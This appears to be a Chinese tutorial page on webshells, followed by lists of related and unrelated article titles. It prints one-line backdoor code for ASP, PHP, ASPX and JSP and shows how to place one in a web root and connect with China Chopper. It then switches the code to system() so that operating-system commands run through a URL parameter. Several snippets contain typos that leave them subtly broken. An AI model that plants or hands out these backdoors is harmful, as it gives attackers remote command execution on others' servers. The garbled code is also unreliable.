webshell(web后门)

一、一句话木马

短小精悍,功能强大,隐蔽性好。

<%
execute request("value")
%>

说明:
使用request的话,post和get两中方式传来的数据都可以接受。

execute用来执行客户端传来的数据。

代码本身没有危害,关键在于我们传输的数据是什么。

常见写法

asp一句话木马

<%eval request("c")%>

php一句话木马

<?php @eval($_POST[‘value’]);?>

aspx一句话木马

<%@ Page Language="Jscript"%>
<%eval(Request.ltem["value"])%>

jsp一句话木马

< % if(request.getParametere("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f")))write(request.getParameter("t").getBytes());% >

利用中国菜刀进行连接
这边我用phpstudy做演示,需要把一句话木马文件放在网站根目录。

一句话木马内容为

<?php @eval($_REQUEST['xx']);
?>



可以手动获取信息

我们把一句话木马内容改成

<?php @system($_REQUEST['xx']);?>

这样可以执行系统命令。注意再次使用中国菜刀连接其他链接之前,需要重置下缓存。
在浏览器输入

http://localhost/123.php?xx=ipconfig

执行系统命令


图片木马的制作

上传到服务器后不能直接执行,得想办法改成脚本格式或者在特定环境下以脚本运行

一句话使用技巧

二、小马、大马




还有其他木马,如打包马、脱裤马等等

脚本木马的制作与原理相关推荐

  1. 渗透知识-脚本木马的制作原理

    一.webshell制作原理 1.webshell种类 一句话木马(使用的最多).小马.大马.打包马.脱裤马等等 2.一句话木马 介绍:短小精悍,并且功能强大.隐蔽性非常好,在入侵种始终扮演着非常重要 ...

  2. web 渗透【4】脚本马的制作与原理

    webshell制作原理 webshell种类 一句话马(使用的最多).小马.大马.打包马.脱裤马... 一句话: 介绍:短小精悍,并且功能强大.隐蔽性非常好,在入侵种始终扮演着非常重要的角色 e.g ...

  3. Web安全—脚本木马工作原理(持续更新)

    Web安全-脚本木马工作原理(持续更新) Webshell分类: 一句话木马 大马 小马 打包马 脱裤马 拿到网站Webshell意义(Webshell的权限取决于Web容器运行的权限,通常为网络服务 ...

  4. Java版AVG游戏开发入门示例 3 ——脚本引擎的制作及应用

    源码下载地址:http://code.google.com/p/loon-simple/downloads/list 根据wikipedia的解释:脚本语言(Script language,scrip ...

  5. Java版AVG游戏开发入门示例[3]——脚本引擎的制作及应用

    源码下载地址:http://code.google.com/p/loon-simple/downloads/list 根据wikipedia的解释:脚本语言(Script language,scrip ...

  6. Atitit.木马病毒websql的原理跟个设计

    Atitit.木马病毒websql的原理跟个设计 1. Keyword Wsql { var sql="select "+p.txt+" as t,"+p.v+ ...

  7. 计算机动画制作过程原理,计算机制作动画的基本原理及运动规律.ppt

    计算机制作动画的基本原理及运动规律 动画的基本原理以及规律 第一节视觉原理 第二节制作原理 第三节动画运动的时间和节奏 第四节卡通角色的运动及规律 1.人物角色运动 2.动物角色运动 3.鱼类.爬行类 ...

  8. html实现光碟转动效果,flash脚本roll应用 制作转动的光碟动画效果

    这次我们利用roll语句制作:鼠标经过时光碟转动,并播放歌曲的动画.包括光碟的制作,滤镜的使用,音乐的插入,属性色彩的调整,以及roll脚本的应用.GIF图片有些失真,只看动画效果即可. 一.制作光碟 ...

  9. 三维立体电影制作 技术原理

    三维立体电影,即我们常说的 4D电影,是立体电影和特技影院结合的产物.随着三维软件在国内越来越广泛的应用, 4D电影也得到了飞速的发展.运用三维软件制作立体电影有其独特的优势,如三维场景本身就具有立体 ...

最新文章

  1. 【知识星球】图像降噪模型和数据集内容开启更新,经典问题永垂不朽!
  2. 用Selenium自动化测试时,让ChromeDriver中不显示“正受到自动测试软件控制”
  3. 前端代码是怎样智能生成的?
  4. 地址总线与内存大小的关系(待续…)
  5. POJ3614防晒霜 这个贪心有点东西(贪心+优先队列)
  6. 小小涉及OpenFeign原理:Could not extract response: no suitable HttpMessageConverter found for response type
  7. python 循环内部添加多个条件判断会出现越界
  8. 如何用java写单链表_如何使用Java实现单链表?
  9. java db 使用_JavaDB的基本使用
  10. 【推荐实践】因果推断在阿里文娱用户增长中的应用
  11. Html5 Canvas动画基础碰撞检测的实现
  12. VeritasBackupexec20.2安装,VMware、hyper备份操作还原备份
  13. RMAN数据库完全备份和恢复
  14. C语言字母O和数字0怎么区分,车牌数字“0”和字母“O”究竟如何区分?看完终于弄明白了...
  15. cmd命令窗口快捷键与小技巧
  16. 一个老工程师给年轻人的十大忠告【转帖】
  17. js等待加载转圈圈效果
  18. 数据分析师有发展前景吗?
  19. 《沙漠自然教育项目全纪实》发布 圣牧有机让绿色的种子种进更多孩子心里
  20. 如何用简短几行代码计算自己的体重指数?

热门文章

  1. 还在为本地到服务器图片的上传下达而烦恼吗?使用base64及flask框架实现服务端部署服务器! 本地客户端图片的上传下达!
  2. 面向中小企业的SpringBoot管理系统,拿来学习真香
  3. java事务什么时候回滚_spring事务什么时候会自动回滚
  4. Vue: Runtime-Compiler和Runtime-only的区别
  5. java序列化与反序列化的使用方法-java.io.InvalidClassException错误
  6. 几种Java序列化方式的实现
  7. java jre、jdk、server jre
  8. RTX2080+CUDA11.7+CUDNN8.6.0+ubuntu20.04+python3.8.10 部署和安装
  9. java script实训心得_javascript实训报告总结.docx
  10. Netfilter IPv4日志